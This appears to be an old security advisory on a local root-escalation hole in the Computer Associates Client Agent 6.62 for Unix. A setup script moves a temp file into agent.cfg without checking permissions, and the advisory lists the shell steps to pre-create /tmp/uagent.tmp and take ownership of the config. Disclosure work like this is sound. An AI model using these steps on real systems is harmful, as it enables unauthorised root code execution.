Client Agent 6.62 for Unix Vulnerability
Tested on a Debian 2.2.14

Introduction
--------------
Client Agent has a hole allowing to execute an arbitrary code by root
without its knowing. In the meantime, some conditions are necessary to
exploit this vulnerability.

Description
------------
Client Agent is used with ARCserveIT, the safe software. It must be installed
on all the workstations. A global configuration file agent.cfg keep every
sub-agents installed on your system. This file is in /usr/CYEagent, and receive
the information from the sub-agent when the script /opt/uagent/uagensetup is run.

uagent.cfg:

debian:/usr/CYEagent# more agent.cfg
#
#(c) Copyright 1989-1999 Computer Associates International, Inc.
#and/or its subsidiaries. All Rights Reserved. Use by the United
#States Government is subject to RESTRICTED RIGHTS as set out in
#the license agreement.
#

[0]
#[UAGENT]
NAME    Uagent
VERSION 5.0.0
HOME    /opt/uagent
#ENV     CHEY_ENV_DEBUG_LEVEL=4
ENV     LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
ENV     SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
ENV     LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
BROWSER asbr
AGENT   uagentd
MERGE   umrgd
VERIFY  umrgd

where asbr, uagentd, and umgrd are programms in /opt/uagent

Client Agent is vulnerable only if uagentsetup is run a second time. The first time,
it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates
a backup of agent.cfg and creates a new agent.cfg without checking permissions.

The code in /opt/uagent/uagentsetup :

# append lines
#
case $ANS in
  y|Y|yes|YES|Yes)
        cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
        ${ECHO} >> ${TMPFILE} || exit 2
        mv ${TMPFILE} $dest || exit 2      <------------
        ;;
esac

So anyone can control this file. The modifications to this file will be used when
the sub-agent will be stopped and restarted.

Exploit
--------

[zorgon@debian /]$ cd /tmp
[zorgon@debian /tmp]$ touch uagent.tmp
[zorgon@debian /tmp]$ chmod 700 uagent.tmp

If uagentsetup is run a second time :

[zorgon@debian /]$ ls -lag /usr/CYEagent/
total 176
drwxr-xr-x    3 root     root         4096 Jul 19 17:46 .
drwxr-xr-x   15 root     root         4096 Jul 11 10:37 ..
-rw-r--r--    1 zorgon   users         618 Jul 19 17:47 agent.cfg
-rw-r--r--    1 root     root          618 Jul 19 17:47 agent.cfg.old
-rwxr-xr-x    1 root     root        16899 Jul 11 10:37 asagent
-rwxr-xr-x    1 root     root       105280 Jul 11 10:37 asagentd
lrwxrwxrwx    1 root     root           11 Jul 12 10:54 li -> /usr/lib/li
-rwxr-xr-x    1 root     root        27878 Jul 19 17:47 libarclic98_api.so
drwxr-xr-x    3 root     root         4096 Jul 11 10:37 nls
[zorgon@debian /]$



==================================
zorgon <zorgon@linuxstart.com>
http://www.nightbird.free.fr
----------------------
Do you do Linux? :) 
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com